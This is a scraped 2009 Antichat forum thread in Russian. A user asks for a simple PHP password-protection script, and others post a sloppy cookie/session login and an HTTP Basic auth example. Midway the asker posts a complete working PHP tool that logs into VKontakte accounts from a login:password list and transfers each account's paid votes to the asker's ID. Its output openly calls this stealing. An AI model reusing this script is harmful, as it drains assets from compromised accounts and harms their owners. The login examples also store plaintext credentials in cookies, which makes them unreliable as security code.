Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Простейший скрипт авторизации без mysql |
26.09.2009, 09:29
|
|
Banned
Регистрация: 19.08.2009
Сообщений: 104
Провел на форуме:
247293
Репутация:
23
|
|
Простейший скрипт авторизации без mysql
Всем доброго времени суток, нужен самый простой скрипт авторизации на пхп без БД, чтобы доступ к странице имел только я.
Заранее спасибо!!!
|
|
|
26.09.2009, 09:34
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
|
|
|
|
26.09.2009, 09:45
|
|
Banned
Регистрация: 19.08.2009
Сообщений: 104
Провел на форуме:
247293
Репутация:
23
|
|
у меня не работает, выдает просто пустой экран, можно обычный скрипт авторизации с обычной формой, без каких - либо access.php?
|
|
|
|
26.09.2009, 10:20
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
PHP код:
<?php
session_start();
//-----------------//
$login = 'xackep'; // Логин
$password = 'qwerty'; // Пароль
//-----------------//
if (($_COOKIE['login'] == $login) && ($_COOKIE['password'] == $password) || ($_SESSION['password'] == md5($login.':'.$password)))
{
echo '<script>alert(\'Вы уже авторизированны\')</script>';
}
else
{
echo '<html>
<head>
<title>Авторизация</title>
</head>
<body>
<form name="autorization" action="" method="POST">
Логин: <input type="text" name="login"><br>
Пароль: <input type="password" name="password"><br>
Запомнить <input type=checkbox name="save_cookie" value=1> ?<p>
<input type="submit" name="data" value="Вход">
</form>
</body>
</html>';
if(($_POST['login']) && ($_POST['password']))
{
if((trim($_POST['login']) == $login) && (trim($_POST['password']) == $password))
{
if(!$_POST['save_cookie'])
{
$_SESSION['password'] = md5($login.':'.$password);
echo '<script>alert(\'Вы авторизированны! (сессия)\')</script>';
}
else
{
setcookie("login",$login);
setcookie("login",$password);
echo '<script>alert(\'Вы авторизированны! (куки)\')</script>';
}
}
else
{
echo '<script>alert(\'Логин или пароль не верны!\')</script>';
}
}
else
{
if((!$_POST['login']) && (!$_POST['password']))
{
}
else
{
echo '<script>alert(\'Введите все значения!\')</script>';
}
}
}
/* geforse.name */
?>
"Авторизация на скорую руку" 
Сохраняет cookie, либо session
*Советую ещё добавить проверку на спец.символы |
|
|
|
26.09.2009, 10:42
|
|
Banned
Регистрация: 19.08.2009
Сообщений: 104
Провел на форуме:
247293
Репутация:
23
|
|
на денвере работает, на хостинге нет, т.е там php 4. можно что то типа вот этого
на php4.
Заранее спасибо! |
|
|
|
26.09.2009, 10:47
|
|
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
Провел на форуме:
1627025
Репутация:
163
|
|
|
|
|
|
26.09.2009, 11:03
|
|
Banned
Регистрация: 19.08.2009
Сообщений: 104
Провел на форуме:
247293
Репутация:
23
|
|
пишет ошибку 500.
|
|
|
|
26.09.2009, 11:10
|
|
Banned
Регистрация: 19.08.2009
Сообщений: 104
Провел на форуме:
247293
Репутация:
23
|
|
вот, что я хочу, впринципе, у меня есть скрипт
PHP код:
<?php
set_time_limit(0);
error_reporting(1);
$to = "АЙДИ НА КОТОРЫЙ ПЕРЕДАВАТЬ ГОЛОСА"; // vote to id
function curl($url,$post)
{
//echo "$url | $post <br>\n";
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
};
function transfer_vote($email,$pass,$to){
$result = curl("http://vkontakte.ru/login.php","email=$email&pass=$pass");
$result = curl("http://vkontakte.ru/app614422","");
preg_match("/viewer_id\", \"(.*?)\"/i", $result, $user_id);
preg_match("/balance = (.*?);/i", $result, $vote);
preg_match("/join(.*?)'>/i", $result, $appsl);
preg_match("/app_id = (.*?);/i", $result, $app_id);
preg_match("/app_hash = '(.*?)';/i", $result, $app_hash);
preg_match("/auth_key\", \"(.*?)\"/i", $result, $auth_key);
if ($vote['1'] >= "1") {
echo "#Спиздили ".$vote['1']." VOTE...<br>";
echo "#Всё ok...<br>";
}
else {
echo "#Нету голосов на акке(<br>";
}
flush();
@ob_flush();
$result = curl("http://vkontakte.ru/apps.php?act=a_settings","app_id=614422&app_hash=".$app_hash['1']."&cn=0&caf=0&caph=0&caa=0&add=".$vote['1']."&withdraw=0");
$result = curl("http://api.vkontakte.fi/votes.php?uid_from=".$user_id['1']."&uid_to=".$to."&votes=".$vote['1']."&auth=".$auth_key['1']);
return $result;
}
echo "<style>body{background-color:#2B2F34;color:#C1C1C7;}input{color:#cccccc;b order:1px solid #404040;background-color:#221;}red{color:#FF0000}</style> ";
$is_aks = is_file ("votes.txt");
if($is_aks != 1){
die('Нету файла с аккаунтами! Создайте файл votes.txt с аккаунтами в виде email@mail.com:password');
}
$aks = file("votes.txt"); // AC file, login:pass
foreach($aks as $k => $v){
$ak = explode(":", trim($v));
echo "<b>--Логинимся--<br>E-mail:".$ak['0'].";password:".$ak['1']."<br>";
$vote_res = transfer_vote($ak['0'],$ak['1'],$to);
echo "------------------------------------------<br>";
flush();
@ob_flush();
}
?>
и файл с акками, так вот, если авторизации не будет, то любой может зайти и украсть мои акки или своровать голоса на свой id, мне надо поставить на этот скрипт защиту паролем. я в php почти ничего не понимаю, подскажите, как защитить скрипт, заранее спасибо! |
|
|
|
26.09.2009, 12:40
|
|
Banned
Регистрация: 19.08.2009
Сообщений: 104
Провел на форуме:
247293
Репутация:
23
|
|
ВСЕ!!! разобрался - я подключил phpmyadmin, создал там таблицу с юзером, взял готовый скрипт авторизации и переделал его под свою БД. УРА!!!
|
|
|
|
26.09.2009, 14:06
|
|
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999
Репутация:
444
|
|
Вот простейший пример.
PHP код:
<?php
$login_successful = false;
// check user & pwd:
if (isset($_SERVER['PHP_AUTH_USER']) && isset($_SERVER['PHP_AUTH_PW'])){
$usr = $_SERVER['PHP_AUTH_USER'];
$pwd = $_SERVER['PHP_AUTH_PW'];
if ($usr == 'jonas' && $pwd == 'secret'){
$login_successful = true;
}
}
// login ok?
if (!$login_successful){
// send 401 headers:
// realm="something" will be shown in the login box
header('WWW-Authenticate: Basic realm="Secret page"');
header('HTTP/1.0 401 Unauthorized');
print "Login failed!n";
}
else {
// show secret page:
print 'you reached the secret page!';
}
?>
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
